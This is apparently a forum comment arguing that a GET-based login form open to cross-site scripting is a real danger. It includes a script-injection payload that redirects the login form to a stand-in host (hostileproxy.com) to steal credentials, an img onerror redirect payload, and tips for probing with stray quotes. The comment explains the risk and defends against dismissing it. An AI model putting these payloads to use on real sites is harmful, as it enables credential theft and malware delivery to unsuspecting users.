But to spell it out for you: Cross-site scripting includes as a vector the ability to cause a person to click on a hostile link and cause the resulting page to do something nasty and unexpected. Suppose I post a link in a forum that contains "?username=jerf'><script>document.forms[0].action="htt://hostileproxy.com/userscrape;something_to_hide_login_error()</script><span x='" and tell someone they have to log in. (I changed http to htt to bypass HN linkification.) Now their login goes to my proxy instead, which transparently steals the username and password, and bounces them back to the original site, leaving the user oblivious.
That's why I mentioned it used GET and not POST; it's somewhat harder to fake up a post in a forum (though it's not impossible, I've done it), but faking a "GET" is just a matter of typing the link in. Even if the forum displays the entire link, some people will click. Not everybody is a programmer.
As for whether this is a real threat, don't even try to tell me this isn't, because I've done this. I didn't steal any logins or do anything nasty, but I definitely got far enough to do it if I wanted to. (In fact, same problem: I tried to report it, and the site owner didn't believe it was a really-exploitable problem, either. Yeah... it was.) I don't even say this like it's a point of pride because it was like taking candy from a baby. Just start sticking ', ", and in the case of textareas, </textarea> in places they don't belong and you too will rapidly join the ranks of leet hacker.
(For double-bonus points, it is sometimes possible to create HTML content that will automatically fire Javascript off in a forum; try something like <img src="does.not.exist.jpg" onerror="window.location='htt://hostile.com'">, just as one for-instance. Now, use a browser vuln to load your choice of spyware onto the user's machine. XSS is more important than it seems; in some cases it can lead to your viewer's machines getting completely owned.)
In IE6, and older versions of Opera, <img src=target> is identical to <script src=target> if it sniffs the content of the response from the target to be javascript. Really.